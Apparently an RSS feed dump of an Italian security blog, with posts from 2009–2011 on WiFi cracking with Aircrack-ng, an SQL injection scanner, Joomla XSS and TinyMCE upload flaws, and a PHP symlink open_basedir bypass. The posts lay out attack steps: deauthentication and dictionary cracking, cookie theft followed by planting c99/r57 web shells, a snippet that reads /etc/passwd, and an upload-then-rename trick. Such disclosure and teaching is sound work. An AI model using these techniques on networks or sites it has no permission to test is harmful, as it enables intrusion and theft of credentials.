<p><span style="font-size: small;">Aircrack-ng è una suite free multipiattaforma che mette a disposizione 17 tools con diversi scopi finalizzati al cracking delle reti Wireless.</span></p>
<p><span style="font-size: small;">Di questi tools ne analizzeremo solo alcuni ed in futuro provvederemo a pubblicare articoli ad hoc per descriverne tutte le funzionalità e configurazioni.</span></p>
<ul>
<li><span style="font-size: small;"><a href="http://www.aircrack-ng.org/doku.php?id=airmon-ng&amp;DokuWiki=f7bd8702fcbac7878009c4908897dfbc" target="_blank"><strong>airmon-ng</strong></a> – Permette di variare le modalità del device di rete permettendo di impostarlo in <strong>modalità “monitor” adatta per effettuare lo sniffing</strong> dei pacchetti. Consente inoltre di creare dispositivi di rete virtuali configurati su un determinato canale o un determina BSSID.</span></li>
<li><span style="font-size: small;"><a href="http://www.aircrack-ng.org/doku.php?id=airodump-ng&amp;DokuWiki=f7bd8702fcbac7878009c4908897dfbc" target="_blank"><strong>airodump-ng</strong></a> – E’ il tool che permette di<strong> monitorare il traffico</strong> captato dalla scheda WiFi ed eventualmente di salvarlo su file “.pcap” che verranno utilizzati in seguito per ottenere le password (<strong>sniffing</strong>).</span></li>
<li><span style="font-size: small;"><a href="http://www.aircrack-ng.org/doku.php?id=aireplay-ng&amp;DokuWiki=f7bd8702fcbac7878009c4908897dfbc" target="_blank"><strong>aireplay-ng</strong></a> – Con questo software si svolge la parte principale dell’attacco ad una rete. In generale si tratta di un generatore di pacchetti che, sfruttando le <strong>7 modalità di injection</strong>, permette di effettuare alcune operazioni sulla rete testata per ottenere le informazioni necessarie al successivo crack.</span></li>
<li><span style="font-size: small;"><a href="http://www.aircrack-ng.org/doku.php?id=aircrack-ng&amp;DokuWiki=f7bd8702fcbac7878009c4908897dfbc" target="_blank"><strong>aircrack-ng</strong></a> – E’ il programma che effettua la vera e propria operazione di cracking permettendo di <strong>ottenere le chiavi Wep, Wpa e Wpa2 della rete sniffata</strong>. Nel caso del cracking Wpa e Wpa2 è necessario disporre di un dizionario tramite il quale effettuare un attacco di tipo “<strong>bruteforce</strong>”.</span></li>
</ul>
<p><span style="font-size: small;">Ebbene si, dei 17 tools indicati in precedenza ne bastano solo 4 per ottenere dei risultati.</span></p>
<h2>Requisiti</h2>
<p><span style="font-size: small;">Come software abbiamo visto che basterà utilizzare la suite aircrack-ng. Questa può essere installata su qualsiasi sistema ma consiglio prevalentemente Mac Os o Linux poiché necessita di particolari tipi di drivers che su Windows non sono completamente funzionanti e non su tutte le schede WiFi.</span></p>
<p><span style="font-size: small;">A livello Hardware è necessario verificare che la scheda Wireless che andremo ad utilizzare possieda un Chipset supportato da questa suite. A questo link potete trovare la <a href="http://www.aircrack-ng.org/doku.php?id=compatibility_drivers&amp;DokuWiki=f7bd8702fcbac7878009c4908897dfbc" target="_blank"><strong>Tabella ufficiale dei Chipset supportati</strong></a> mentre per conoscere quello montato sul vostro Pc vi basterà utilizzare il comando “airmon-ng” o consultare le specifiche del produttore della scheda.</span></p>
<h2><a href="http://www.capn3m0.org/wp-content/uploads/2011/04/wifi20logo.gif" rel="lightbox[2261]" title="wifi20logo"><img class="alignleft size-thumbnail wp-image-2263" title="wifi20logo" src="http://www.capn3m0.org/wp-content/uploads/2011/04/wifi20logo-150x150.gif" alt="[HOWTO]   WiFi Crack Aircrack ng suite" width="150" height="150" /></a>Concetti Base</h2>
<p><span style="font-size: small;">Dopo aver descritto l’occorrente passiamo a parlare di come funzionano e si attaccano le varie tipologie di chiavi di sicurezza.</span></p>
<h3>WEP</h3>
<p><span style="font-size: small;">La chiave <strong><a href="http://it.wikipedia.org/wiki/Wired_Equivalent_Privacy" target="_blank">WEP</a> (Wired Equivalent Privacy)</strong> ormai ritenuta <strong>molto vulnerabile e sconsigliata</strong> come sistema di sicurezza si basa su un algoritmo che mixa due chiavi di diversa lunghezza criptandoli in due modi diversi. Durante le trasmissioni in chiaro a queste chiavi vengono aggiunti 24 bit definiti <strong>IVS</strong> che, come scopriremo in seguito, sono la causa della facilità con cui tali chiavi vengono crackate.</span></p>
<p><span style="font-size: small;">In maniera molto semplicistica il concetto è che durante lo sniffing delle trasmissioni tra Router e il Client (per Client intendo il vero utilizzatore/proprietario della rete) otteniamo dei pacchetti contenenti parte della chiave (<strong>Pre Shared Key</strong>) e gli IVS che vengono aggiunti durante la trasmissione.</span></p>
<p><span style="font-size: small;">Facendo elaborare queste due informazioni al tool “<strong>aircrack-ng</strong>” si può ottenere la <strong>password in chiaro in pochi minuti</strong>. Fattore determinante sono il numero di IVS sniffati.</span></p>
<p><span style="font-size: small;">Esempio di attacco:</span></p>
<ol>
<li><span style="font-size: small;">Si attiva lo sniffing sulla Rete vittima (<strong>airodump-ng</strong>);</span></li>
<li><span style="font-size: small;">In contemporanea si lanciano di verse sessioni di &#8220;<strong>aireplay-ng</strong>&#8221; utilizzando diverse modalità di attacco. In questo modo da una parte facciamo cadere la connessione al Client correttamente connesso (<strong>DeAuth</strong><strong> </strong>) mentre dall&#8217;altra cerchiamo di forzare una finta autenticazione con il nostro dispositivo (<strong>FakeAuth</strong>). Con un attacco <strong>ARP Replay</strong>, invece, generiamo maggiore traffico e, di conseguenza, un numero maggiore di <strong>IVS</strong>.</span></li>
<li><span style="font-size: small;">A questo punto una volta sniffata una sessione di autenticazione Router/Client e un buon numero di <strong>IVS</strong> possiamo far elaborare il file sniffato a &#8220;<strong>aircrack-ng</strong>&#8221; che, dopo poco tempo, <strong>ci restituirà la chiave Wep in chiaro</strong>.</span></li>
</ol>
<h3>WPA e WPA2</h3>
<p><span style="font-size: small;">Dopo il fallimento della WEP venne introdotta la codifica <a href="http://it.wikipedia.org/wiki/Wi-Fi_Protected_Access" target="_blank"><strong>WPA (Wi-Fi Protected Access)</strong></a> che invece di una chiave precondivisa introdusse una chiave Temporanea (<strong>Temporal Key Integrity Protocol o TKIP</strong>) e un numero maggiore di bit rendendo vani gli attacchi che permettevano il cracking del WEP.</span></p>
<p><span style="font-size: small;">Successivamente dato che venne dimostrata la vulnerabilità anche della WPA venne introdotta la <strong>WPA2</strong> che, ad oggi, risulta essere completamente sicuro.</span></p>
<p><span style="font-size: small;">Esempio di attacco:</span></p>
<ol>
<li><span style="font-size: small;">Si attiva lo sniffing sulla Rete vittima (<strong>airodump-ng</strong>);</span></li>
<li><span style="font-size: small;">In contemporanea si lancia una o più sessioni di &#8220;<strong>aireplay-ng</strong>&#8221; in cui, utilizzando la modalità &#8220;<strong>DeAuth</strong>&#8221; facciamo cadere la connessione al Client correttamente connesso.</span></li>
<li><span style="font-size: small;">A questo punto una volta sniffata la sessione di riconnessione Client/Router (<strong>handshake</strong>) possiamo far elaborare il file sniffato a &#8220;<strong>aircrack-ng</strong>&#8221; in modalità &#8220;<strong>bruteforce</strong>&#8221; tramite dizionario. <strong>Se nel dizionario abbiamo la password WPA/WPA2 ci verrà segnalata</strong> altrimenti non c&#8217;è modo di individuarla.</span></li>
</ol>
<p><span style="font-size: small;">Nel prossimo articolo analizzeremo nel dettaglio un attacco ad una rete WEP.</span></p>
<p>&nbsp;</p>
<hr style="width: 75%;" />
<p>&nbsp;</p>
<p><strong>N.B. </strong></p>
<p><strong>Ricordo che l’accesso abusivo ad un sistema informatico o telematico è un reato perseguibile a termine di legge (art. 615-ter c.p.).</strong></p>
<p><strong> Ricordo che la detenzione e la diffusione abusiva di codici di accesso a sistemi informatici o telematici è un reato penale perseguibile secondo la legge 615.</strong></p>
<p><strong>L&#8217;utilizzo di quanto esposto è da riferirsi a un test di sicurezza sulla propria rete o su una rete di cui il proprietario abbia espressamente dato il libero consenso al fine di giudicarne la sicurezza e porre rimedio ad eventuali vulnerabilità.</strong></p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/wireless-crack-aircrack-suite.html/feed/</wfw:commentRss>
		<slash:comments>7</slash:comments>
		</item>
		<item>
		<title>XCode SQL Injection Scanner</title>
		<link>http://www.capn3m0.org/xcode-sql-injection-scanner.html</link>
		<comments>http://www.capn3m0.org/xcode-sql-injection-scanner.html#comments</comments>
		<pubDate>Tue, 15 Mar 2011 18:41:57 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[sql injection]]></category>
		<category><![CDATA[vulnerability]]></category>
		<category><![CDATA[xcode]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=1903</guid>
		<description><![CDATA[&#160; Breve videoguida all&#8217;utilizzo di XCode SQL Injection Scanner che permette di filtrare tramite Dork su Google eventuali siti vulnerabili a Sql Injection e, successivamente, lancia degli attacchi standard per verificare quali effettivamente risultano vulnerabili. Un buon tool che permette di risparmiare tempo durante i pentest! http://www.youtube.com/v/9d1bL5dN_KY?f=videos&#38;app=youtube_gdata Read the rest here: XCode SQL Injection Scanner]]></description>
			<content:encoded><![CDATA[<p>&nbsp;</p>
<p>Breve videoguida all&#8217;utilizzo di XCode SQL Injection Scanner che permette di filtrare tramite Dork su Google eventuali siti vulnerabili a Sql Injection e, successivamente, lancia degli attacchi standard per verificare quali effettivamente risultano vulnerabili.</p>
<p>Un buon tool che permette di risparmiare tempo durante i pentest! <img src='http://www.capn3m0.org/wp-includes/images/smilies/icon_wink.gif' alt="XCode SQL Injection Scanner" class='wp-smiley' title="XCode SQL Injection Scanner pics" /> </p>
<p><object width="370" height="305" type="application/x-shockwave-flash" data="http://www.youtube.com/v/9d1bL5dN_KY?f=videos&amp;app=youtube_gdata"><a href="http://www.youtube.com/v/9d1bL5dN_KY?f=videos&amp;app=youtube_gdata">http://www.youtube.com/v/9d1bL5dN_KY?f=videos&amp;app=youtube_gdata</a></object></p>
<p>Read the rest here:<br />
<a title="XCode SQL Injection Scanner" href="http://www.youtube.com/watch?v=9d1bL5dN_KY&amp;feature=youtube_gdata" target="_blank">XCode SQL Injection Scanner</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/xcode-sql-injection-scanner.html/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Servizio delle Iene sulla Sicurezza Informatica di un Provider Italiano</title>
		<link>http://www.capn3m0.org/servizio-iene-sicurezza-informatica.html</link>
		<comments>http://www.capn3m0.org/servizio-iene-sicurezza-informatica.html#comments</comments>
		<pubDate>Mon, 01 Nov 2010 20:36:05 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[Vulnerabilità]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[hack mail]]></category>
		<category><![CDATA[provider]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[sicurezza informatica]]></category>
		<category><![CDATA[vulnerabilità]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=808</guid>
		<description><![CDATA[ Ieri (28/10/2010) il programma televisivo Le Iene ha pubblicato un servizio dimostrativo sulla vulnerabilità dei sistemi informatici Italiani prendendo di mira un provider di caselle eMail gratuite. Il servizio dimostra come sia possibile accedere (con una piccola sostituzione di parametri) alla casella eMail di un estraneo e prenderne il completo controllo. ]]></description>
			<content:encoded><![CDATA[<p>Il 28/10/2010 il programma televisivo <strong>Le Iene</strong> ha pubblicato un servizio dimostrativo sulla vulnerabilità dei sistemi informatici Italiani prendendo di mira un provider di caselle eMail gratuite. Il servizio dimostra come sia possibile accedere (con una piccola sostituzione di parametri) alla casella eMail di un estraneo e prenderne il completo controllo.</p>
<p>
<object id="veohFlashPlayer" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="450" height="341" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="name" value="veohFlashPlayer" /><param name="allowFullScreen" value="true" /><param name="allowscriptaccess" value="always" /><param name="src" value="http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.3.1024&amp;permalinkId=v205465564BHCqS5a&amp;player=videodetailsembedded&amp;videoAutoPlay=0&amp;id=anonymous" /><param name="allowfullscreen" value="true" /><embed id="veohFlashPlayer" type="application/x-shockwave-flash" width="450" height="341" src="http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.3.1024&amp;permalinkId=v205465564BHCqS5a&amp;player=videodetailsembedded&amp;videoAutoPlay=0&amp;id=anonymous" allowscriptaccess="always" allowfullscreen="true" name="veohFlashPlayer"></embed></object>
</p>
<p>Read the original here:<br />
 <a title="Servizio delle Iene sulla Sicurezza Informatica di un Provider Italiano" href="http://feedproxy.google.com/~r/OverSecurity/~3/9x5bVt5F7CY/" target="_blank">Servizio delle Iene sulla Sicurezza Informatica di un Provider Italiano</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/servizio-iene-sicurezza-informatica.html/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Neuromancer &#8211; Hacking sites with Joomla (Universidade USP)</title>
		<link>http://www.capn3m0.org/%e3%80%8cneuromancer%e3%80%8dhacking-sites-with-joomla-universidade-usp.html</link>
		<comments>http://www.capn3m0.org/%e3%80%8cneuromancer%e3%80%8dhacking-sites-with-joomla-universidade-usp.html#comments</comments>
		<pubDate>Sun, 31 Oct 2010 01:02:54 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[Vulnerabilità]]></category>
		<category><![CDATA[defacement]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[joomla]]></category>
		<category><![CDATA[joomla 1.5]]></category>
		<category><![CDATA[neuromancer]]></category>
		<category><![CDATA[security exploit]]></category>
		<category><![CDATA[tutorial]]></category>
		<category><![CDATA[universidade]]></category>
		<category><![CDATA[usp]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=524</guid>
		<description><![CDATA[Video Tutorial dell&#8217;utilizzo della nota (e vecchia) vulnerabilità Joomla 1.5.x Remote Admin Password Change Original post: 「Neuromancer」Hacking sites with Joomla (Universidade USP)]]></description>
			<content:encoded><![CDATA[<p>Video Tutorial dell&#8217;utilizzo della nota (e vecchia) vulnerabilità <a href="http://www.capn3m0.org/joomla-15x-remote-admin-password-change.html" target="_self"><strong>Joomla 1.5.x Remote Admin Password Change</strong></a></p>
<p><object width="370" height="305" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="data" value="http://www.youtube.com/v/487RCxcT_og?f=videos&amp;app=youtube_gdata" /><param name="src" value="http://www.youtube.com/v/487RCxcT_og?f=videos&amp;app=youtube_gdata" /><embed width="370" height="305" type="application/x-shockwave-flash" src="http://www.youtube.com/v/487RCxcT_og?f=videos&amp;app=youtube_gdata" data="http://www.youtube.com/v/487RCxcT_og?f=videos&amp;app=youtube_gdata" /></object></p>
<p><img src="http://www.capn3m0.org/wp-content/uploads/2010/10/6078cffcdefault.jpg" alt="Neuromancer   Hacking sites with Joomla (Universidade USP)"  title="Neuromancer   Hacking sites with Joomla (Universidade USP) pics" /></p>
<p>Original post:<br />
<a title="「Neuromancer」Hacking sites with Joomla (Universidade USP)" href="http://www.youtube.com/watch?v=487RCxcT_og&amp;feature=youtube_gdata" target="_blank">「Neuromancer」Hacking sites with Joomla (Universidade USP)</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/%e3%80%8cneuromancer%e3%80%8dhacking-sites-with-joomla-universidade-usp.html/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>[EXPLOIT] &#8211; Joomla all versions XSS vulnerability</title>
		<link>http://www.capn3m0.org/exploit-joomla-all-versions-xss-vulnerability.html</link>
		<comments>http://www.capn3m0.org/exploit-joomla-all-versions-xss-vulnerability.html#comments</comments>
		<pubDate>Sat, 09 Oct 2010 16:42:38 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Vulnerabilità]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[joomla]]></category>
		<category><![CDATA[proof of concept]]></category>
		<category><![CDATA[vulnerability]]></category>
		<category><![CDATA[wordpress]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/exploit-joomla-all-versions-xss-vulnerability.html</guid>
		<description><![CDATA[Ciao a tutti, dopo diverso tempo dall&#8217;ultimo post pubblico una vulnerabilità che potrà creare non pochi problemi agli utilizzatori del noto Cms Joomla. E&#8217; stata pubblicata da poco una vulnerabilità di tipo XSS per tutte le versioni &#60; =1.5.20, ossia tutte le versioni attualmente pubblicate. Tale exploit sfrutta una falla nella verifica delle variabili GET [...]]]></description>
			<content:encoded><![CDATA[<p><br class="spacer_" /></p>
<p><a href="http://www.capn3m0.org/wp-content/uploads/2010/10/joomla-hack1.png" rel="lightbox[386]" title="Joomla"><img class="alignleft size-thumbnail wp-image-387" title="Joomla" src="http://www.capn3m0.org/wp-content/uploads/2010/10/joomla-hack1-150x150.png" alt="[EXPLOIT]   Joomla all versions XSS vulnerability" width="150" height="150" /></a>Ciao a tutti, dopo diverso tempo dall&#8217;ultimo post pubblico una vulnerabilità che potrà creare non pochi problemi agli utilizzatori del noto <strong><a href="http://www.joomla.org" target="_blank">Cms Joomla</a></strong>.</p>
<p>E&#8217; stata pubblicata da poco una vulnerabilità di tipo <strong>XSS</strong> per tutte le versioni <strong>&lt; =1.5.20</strong>, ossia <strong>tutte le versioni attualmente pubblicate</strong>.</p>
<p>Tale exploit sfrutta una falla nella verifica delle variabili GET encodate eseguendo quindi il codice Javascript che si passa all&#8217;applicativo.</p>
<p><a href="http://seclists.org/fulldisclosure/2010/Oct/109" target="_blank">Full Discolsure Advisories</a></p>
<p>Al seguente video si potrà vedere un Proof of Concept dell&#8217;attacco Xss.</p>
<p><a href="http://yehg.net/lab/pr0js/training/view/misc/joomla-1.5.20_encoded-xss/">Proof of Concept by yehg.net</a></p>
<p><span id="more-386"></span></p>
<p>Un malintenzionato potrebbe sfruttare tale falla per rubare i cookie degli utenti loggati, Administrator compreso, e sfruttarli per modificare pagine o uploadare shell malevole che permetterebbero qualsiasi operazione nello spazio del sito vittima. Una volta rubati i cookie di Admin, infatti, basterà andare nella pagina di edit di uno dei template di default, di solito &#8216;beez&#8217;, e successivamente editare la pagina con il codice di una shell php quali <strong>c99</strong> o <strong>r57</strong>.</p>
<p>Provvedero&#8217; ad aggiornare il post quanto prima con tutti i riferimenti e i dettagli (sono in treno con l&#8217;app WordPress per Blackberry <img src='http://www.capn3m0.org/wp-includes/images/smilies/icon_smile.gif' alt="[EXPLOIT]   Joomla all versions XSS vulnerability" class='wp-smiley' title="[EXPLOIT]   Joomla all versions XSS vulnerability pics" />  ).</p>
<p><strong>AGGIORNAMENTO #1</strong><br />
 Lo staff di Joomla ha provveduto a rilasciare la nuova versione dove tale problema e&#8217; stato fixato.</p>
<p>Chiunque utilizzi questo Cms e&#8217; invitato ad <strong>effettuare l&#8217;upgrade alla versione 1.5.21</strong></p>
<p><a href="http://www.joomla.org/announcements/release-news/5300-joomla-1521-released.html" target="_blank">Joomla 1.5.21 &#8211; Official Site</a></p>
<p><a href="http://developer.joomla.org/security/news/9-security/10-core-security/322-20101001-core-xss-vulnerabilities.html" target="_blank">Joomla Security News</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/exploit-joomla-all-versions-xss-vulnerability.html/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>PHP 5.2.12/5.3.1 symlink() open_basedir bypass</title>
		<link>http://www.capn3m0.org/php-5.2.125.3.1-symlink-open_basedir-bypass.html</link>
		<comments>http://www.capn3m0.org/php-5.2.125.3.1-symlink-open_basedir-bypass.html#comments</comments>
		<pubDate>Wed, 06 Jan 2010 22:10:50 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[Vulnerabilità]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[php]]></category>
		<category><![CDATA[vulnerabilità]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=367</guid>
		<description><![CDATA[Sebbene in ritardo rispetto alla data di pubblicazione di questo Exploit (13/11/2009) oggi vi parlerò di una grave falla individuata nelle versioni 5.2.12/5.3.1 del Php che sfruttando delle falle strutturali delle funzioni symlink() permette di bypassare il check dei permessi della funzione open_basedir. Di fatto questa vulnerabilità da la possibilità di leggere aree/file del WebServer [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.capn3m0.org/wp-content/uploads/2010/01/php.jpg" rel="lightbox[367]" title="Php"><img class="alignleft size-thumbnail wp-image-368" title="Php" src="http://www.capn3m0.org/wp-content/uploads/2010/01/php-150x150.jpg" alt="PHP 5.2.12/5.3.1 symlink() open basedir bypass " width="150" height="150" /></a>Sebbene in ritardo rispetto alla data di pubblicazione di questo Exploit (13/11/2009) oggi vi parlerò di una grave falla individuata nelle versioni <strong>5.2.12/5.3.1 del Php</strong> che sfruttando delle falle strutturali delle funzioni <strong>symlink()</strong> permette di bypassare il check dei permessi della funzione open_basedir.</p>
<p>Di fatto questa <strong>vulnerabilità</strong> da la possibilità di leggere aree/file del WebServer non autorizzate quali il file &#8220;<strong>/etc/passwd</strong>&#8221; e similari.</p>
<p>L&#8217;applicazione pratica e più semplice di tale vulnerabilità è il seguente codice:</p>

<div class="wp_syntax"><div class="code"><pre class="php" style="font-family:monospace;"><span style="color: #339933;">&lt;</span> ?php
 <span style="color: #990000;">symlink</span><span style="color: #009900;">&#40;</span><span style="color: #0000ff;">&quot;/etc/passwd&quot;</span><span style="color: #339933;">,</span> <span style="color: #0000ff;">&quot;prova.txt&quot;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
 <span style="color: #000000; font-weight: bold;">?&gt;</span></pre></div></div>

<p><span>Se il &#8220;safe_mode&#8221; del Php era disabilitato nel proprio spazio sarebbe stato creato un link simbolico dal nome &#8220;prova.txt&#8221; che puntava al contenuto di &#8220;/etc/passwd&#8221;. In questo modo richiamando dal browser il link simbolico nel seguente modo:</span></p>
<p><cite><span>http://&lt;dominio&gt;/prova.txt</span></cite></p>
<p><span>avremmo visualizzato a video il contenuto del file &#8220;/etc/passwd&#8221;. A seconda dell&#8217;Hosting questo file può contenere anche le password dell&#8217;account web del Cliente e pertanto la gravità della vulnerabilità è elevata.</span></p>
<p><span>Nel caso, invece, il safe_mode del Php fosse stato attivo sarebbe stato visualizzato un messaggio di errore che indicava l&#8217;impossibilità di eseguire l&#8217;operazione a causa della mancanza dei permessi di accesso al file &#8220;/etc/passwd&#8221;.</span></p>
<p>Ho provato ad applicare questa tecnica su diversi Hosting dove ho sitarelli o spazi per fare dei test e in base ad alcune configurazioni di sicurezza (privilegi, followsymlink,etc.) si poteva o meno accedere a dati sensibili come, per esempio, visualizzare i file di configurazione di altri domini presenti sullo stesso server dove siamo noi.</p>
<p>Questa <strong>vulnerabilità</strong> del Php ha fatto nascere alcune discussioni legate ai vari <strong>attacchi di massa</strong> che si sono verificati lo scorso anno su vari Hosting condivisi noti e meno noti. Dal mio punto di vista è plausibile pensare, quindi, che questa falla abbia dato la possibilità di accedere e violare centinaia di spazi Web rubando informazioni preziose per eventuali ulteriori attacchi.</p>
<p>Link correlati:</p>
<p><a href="http://www.exploit-db.com/exploits/10557" target="_blank"><strong>Exploit</strong></a></p>
<p><a href="http://securityreason.com/achievement_exploitalert/14" target="_blank"><strong>PHP 5.2.12/5.3.1 symlink() open_basedir bypass &#8211; SecurityReason.com</strong></a></p>
<p><a href="http://sicurezza.html.it/articoli/leggi/1007/tecniche-symlink-attack/" target="_blank"><strong>Symlink Attack &#8211; HTML.it</strong></a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/php-5.2.125.3.1-symlink-open_basedir-bypass.html/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>[EXPLOIT] &#8211; Joomla 1.5.12 RCE via TinyMCE upload vulnerability</title>
		<link>http://www.capn3m0.org/exploit-joomla-1.5.12-rce-via-tinymce-upload-vulnerability.html</link>
		<comments>http://www.capn3m0.org/exploit-joomla-1.5.12-rce-via-tinymce-upload-vulnerability.html#comments</comments>
		<pubDate>Tue, 24 Nov 2009 23:35:03 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[hash md5]]></category>
		<category><![CDATA[joomla]]></category>
		<category><![CDATA[joomla 1.5.12]]></category>
		<category><![CDATA[tinymce exploit]]></category>
		<category><![CDATA[vulnerabilità]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=354</guid>
		<description><![CDATA[Per chi non avesse ancora aggiornato Joomla all&#8217;ultima versione 1.5.15 segnalo l&#8217;ennesima vulnerabilità trovata nelle versioni precedenti. Questa volta si tratta di una Remote Command Execution che sfruttando una vulnerabilità dell&#8217;utilizzatissimo TinyMCE permette di uploadare file che, teoricamente, dovrebbero essere proibiti. La vulnerabilità è stata scoperta dall&#8217;italiano Luca &#8220;daath&#8221; De Fulgentis che ha illustrato nel [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.capn3m0.org/wp-content/uploads/2009/11/joomla_tra.jpg" rel="lightbox[354]" title="Joomla"><img class="alignleft size-thumbnail wp-image-355" title="Joomla" src="http://www.capn3m0.org/wp-content/uploads/2009/11/joomla_tra-150x150.jpg" alt="[EXPLOIT]   Joomla 1.5.12 RCE via TinyMCE upload vulnerability" width="150" height="150" /></a>Per chi non avesse ancora aggiornato <a href="http://www.joomla.org" target="_blank"><strong>Joomla</strong></a> all&#8217;ultima versione 1.5.15 segnalo l&#8217;ennesima <strong>vulnerabilità</strong> trovata nelle versioni precedenti.</p>
<p>Questa volta si tratta di una Remote Command Execution che sfruttando una vulnerabilità dell&#8217;utilizzatissimo TinyMCE permette di uploadare file che, teoricamente, dovrebbero essere proibiti. La vulnerabilità è stata scoperta dall&#8217;italiano Luca &#8220;daath&#8221; De Fulgentis che ha illustrato nel dettaglio l<strong>&#8216;exploit</strong> nel suo <a href="http://blog.nibblesec.org/2009/09/just-press-exploit.html" target="_blank">blog</a>.</p>
<p>Dal sito di <a href="http://www.exploit-db.com/exploits/10183" target="_blank">Offensive-Security</a>, che andrà a sostituire il noto <a href="http://www.milw0rm.com/" target="_blank">Milw0rm</a>, ormai chiuso, è possibile <strong>scaricare l&#8217;exploit Php</strong> che consente di uploadare qualsiasi tipo di file semplicemente eseguend l&#8217;exploit php dalla propria shell.</p>
<p><span id="more-354"></span></p>
<p>Come detto in precedenza l&#8217;hack sfrutta una vulnerabilità del<strong> TinyMCE</strong>. Questo editor utilizza un array dove vengono dichiarate le estensioni dei file che non possono essere uploadate ma modificando opportunamente gli <strong>Header HTTP</strong> è possibile uploadare un file con un&#8217;estensione accettata e successivamente far effettuare il rename del file allo stesso TinyMCE.</p>
<p>Ovviamente vi è un sistema di &#8220;sicurezza&#8221; nello script dell&#8217;editor ma, purtroppo, si tratta di una semplice verifica di un <strong>hash MD5</strong> generato dalla concatenazione della path assoluta con una variabile chiamata &#8220;$tinybrowser['obfuscate']&#8221; che è settata di default a &#8220;s0merand0mjunk!!!111&#8243; nel file &#8220;config_tinybrowser.php&#8221; che trovate al seguente percorso:</p>
<p><cite>http://&lt;path_joomla&gt;/</cite>plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/config_tinybrowser.php</p>
<p><a href="http://www.capn3m0.org/wp-content/uploads/2009/11/tinybrowser.PNG" rel="lightbox[354]" title="TinyBrowser"><img class="aligncenter size-thumbnail wp-image-356" title="TinyBrowser" src="http://www.capn3m0.org/wp-content/uploads/2009/11/tinybrowser-150x150.PNG" alt="[EXPLOIT]   Joomla 1.5.12 RCE via TinyMCE upload vulnerability" width="150" height="150" /></a></p>
<p>Questo invece il sistema di &#8220;sicurezza&#8221; (o meglio, la <strong>vulnerabilità</strong>) del file &#8220;upload_file.php&#8221; che verifica l&#8217;Hash MD5:</p>
<p><br class="spacer_" /></p>
<p><a href="http://www.capn3m0.org/wp-content/uploads/2009/11/uploadtinybrowser.PNG" rel="lightbox[354]" title="Upload File TinyBrowser"><img class="aligncenter size-thumbnail wp-image-357" title="Upload File TinyBrowser" src="http://www.capn3m0.org/wp-content/uploads/2009/11/uploadtinybrowser-150x150.PNG" alt="[EXPLOIT]   Joomla 1.5.12 RCE via TinyMCE upload vulnerability" width="150" height="150" /></a></p>
<p>L&#8217;<strong>exploit</strong> creato da daath una volta indicato il &#8220;sito vittima&#8221; per prima cosa provvede a bypassare questo meccanismo effettuando un Path Disclosure. Con questa tecnica si interroga un file in modo non corretto così da far mostrare a video un tipico errore PHP che riporta la path assoluta del file in errore. Una volta ottenuta questa informazione si potrà ricreare l&#8217;Hash MD5 (path assoluta + &#8216;s0merand0mjunk!!!111&#8242;) tramite il quale poter lanciare una <strong>POST Http</strong> per l&#8217;upload del file. Il file, ovviamente, dovrà avere un&#8217;estensione valida come, ad esempio, &#8220;.jpg&#8221;.</p>
<p>Una volta effettuato l&#8217;upload si effettua una seconda interrogazione Http inviando i dati necessari a far eseguire il rename del file da &#8220;.jpg&#8221; (o qualunque estensione è stata scelta) a &#8220;.php&#8221;.</p>
